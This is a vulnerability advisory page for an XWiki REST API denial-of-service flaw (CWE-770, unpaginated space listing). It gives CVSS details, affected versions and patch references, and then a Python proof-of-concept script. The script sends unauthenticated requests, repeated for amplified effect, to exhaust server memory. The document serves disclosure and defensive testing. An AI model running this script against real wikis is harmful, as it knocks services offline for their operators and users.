Security Vulnerability Report
CVE-2025-66473 (CVSS 7.5 HIGH)

Published: 2025-12-10 22:16:28
Last Modified: 2025-12-19 17:14:44

Description

XWiki is an open-source wiki software platform. Versions 16.10.10 and below, 17.0.0-rc-1 through 17.4.3, and 17.5.0-rc-1 through 17.6.0 contain a REST API that does not enforce any limit on the number of items that can be requested in a single request. Depending on the number of pages in the wiki and the memory configuration, this can lead to slowness and unavailability of the wiki. As an example, the /rest/wikis/xwiki/spaces resource returns all spaces on the wiki by default, which amounts to essentially every page. This issue is fixed in versions 17.4.4 and 16.10.11.

CVSS Details

CVSS 3.1 (Primary)
Score
7.5
Severity
HIGH
Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Exploitability Score
3.9
Impact Score
3.6

CVSS 4.0 (Secondary)
Score
8.7
Severity
HIGH
Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weakness
CWE-770 (Allocation of Resources Without Limits or Throttling)

Configurations (Affected Products)

cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* - VULNERABLE: XWiki ≤ 16.10.10
cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* - VULNERABLE: XWiki 17.0.0-rc-1 to 17.4.3
cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* - VULNERABLE: XWiki 17.5.0-rc-1 to 17.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-66473 PoC - XWiki REST API DoS
# Target: XWiki instances with unpatched REST API
target_url = "http://target-server:8080/xwiki/rest/wikis/xwiki/spaces"
headers = {
    "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-66473-PoC)",
    "Accept": "application/json",
}

print("[*] Sending request to trigger CVE-2025-66473...")
print(f"[*] Target: {target_url}")

try:
    # This request will attempt to retrieve ALL spaces/pages,
    # causing memory exhaustion on large wikis
    response = requests.get(target_url, headers=headers, timeout=30)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Size: {len(response.content)} bytes")
    if response.status_code == 200:
        data = response.json()
        print(f"[!] Retrieved {len(data.get('spaces', []))} spaces")
        print("[!] Vulnerability confirmed - no pagination limit enforced")
except requests.exceptions.Timeout:
    print("[!] Request timed out - possible DoS condition triggered")
except Exception as e:
    print(f"[-] Error: {str(e)}")

# Alternative: several repeated requests (sent one after another here) for amplified effect
print("\n[*] Testing repeated request amplification...")
for i in range(5):
    try:
        requests.get(target_url, headers=headers, timeout=60)
        print(f"[*] Sent request {i+1}/5")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request {i+1}/5 failed: {str(e)}")

References

https://github.com/xwiki/xwiki-platform/commit/e3c47745195fb445b054537be86f5c01ee69558b (Patch)
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cc84-q3v3-mhgf (Patch, Vendor Advisory)
https://jira.xwiki.org/browse/XWIKI-23355 (Patch, Vendor Advisory)
